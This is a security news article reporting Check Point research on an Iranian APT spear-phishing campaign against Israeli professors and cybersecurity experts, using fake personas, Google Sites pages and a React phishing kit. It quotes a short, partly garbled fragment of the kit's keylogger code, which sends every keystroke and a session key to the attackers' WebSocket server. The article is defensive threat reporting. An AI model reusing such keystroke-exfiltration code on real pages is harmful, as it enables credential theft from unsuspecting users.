Wednesday, September 16, 2026
Follow on LinkedIn

Iranian APT35 Hackers Attacking High-Profile Cyber Security Experts & Professors from Israel

A sophisticated spear-phishing campaign targeting Israeli cybersecurity experts and computer science professors has emerged amid escalating tensions between Iran and Israel.

The Iranian threat group Educated Manticore, widely associated with the Islamic Revolutionary Guard Corps’ Intelligence Organization, has launched precision attacks against leading academics from Israeli universities and high-profile cybersecurity professionals since mid-June 2025.

The attackers employ deceptive social engineering tactics, impersonating fictitious employees of prominent cybersecurity companies through carefully crafted emails and WhatsApp messages.

Initial email impersonating a fictitious Threat Intelligence Analyst (Source – Check Point)

These communications request consultations on enhancing cybersecurity for energy companies, leveraging the current geopolitical climate to create urgency and legitimacy.

The threat actors demonstrate remarkable sophistication in their approach, utilizing AI-assisted content generation to produce formal, error-free communications that initially appear genuine to potential victims.

Check Point researchers identified that the campaign represents a significant evolution in Educated Manticore’s operational capabilities, marking a new phase where the group specifically targets the credibility of cybersecurity organizations to gain victim trust.

Link to the phishing page sent via WhatsApp to one of the targets (Source – Check Point)

The attackers guide engaged targets toward fake Google Meet invitations or credential harvesting pages, designed to intercept both passwords and two-factor authentication codes through advanced phishing infrastructure.

Fake image redirecting to the attackers’ servers (Source – Check Point)

The campaign utilizes multi-stage phishing pages hosted on Google Sites service, adding legitimacy through the trusted Google domain.

Once victims interact with these pages, they encounter a sophisticated React-based Single Page Application designed to closely mimic legitimate Google authentication flows.

Advanced Phishing Infrastructure

The technical foundation of this campaign centers on a custom-built phishing kit implemented as a React-based Single Page Application.

The malicious infrastructure demonstrates remarkable technical sophistication, utilizing dynamic UI rendering and real-time data exfiltration capabilities that distinguish it from conventional phishing operations.

The phishing kit maintains persistent WebSocket connections on the /sessions endpoint, establishing continuous communication channels with command-and-control servers.

This architecture enables real-time credential harvesting through an integrated passive keylogger that captures every keystroke, transmitting data even when users abandon forms without submission:-

n && !t && n.send(JSON.stringify({
d: "kl",
c: a.which in 1s ? ls [a.which] : a.key,
sk: localStorage.getItem("sk"),
page: e
}))

The infrastructure spans over 130 unique domains resolving to multiple IP addresses, primarily registered through NameCheap.

This extensive network enables rapid infrastructure rotation when domains are identified and taken down, ensuring campaign continuity despite increased security scrutiny.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now

Tushar Subhra Dutta
Tushar Subhra Dutta
Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Cyber Security Guide

Latest Cyber News

Expert Talks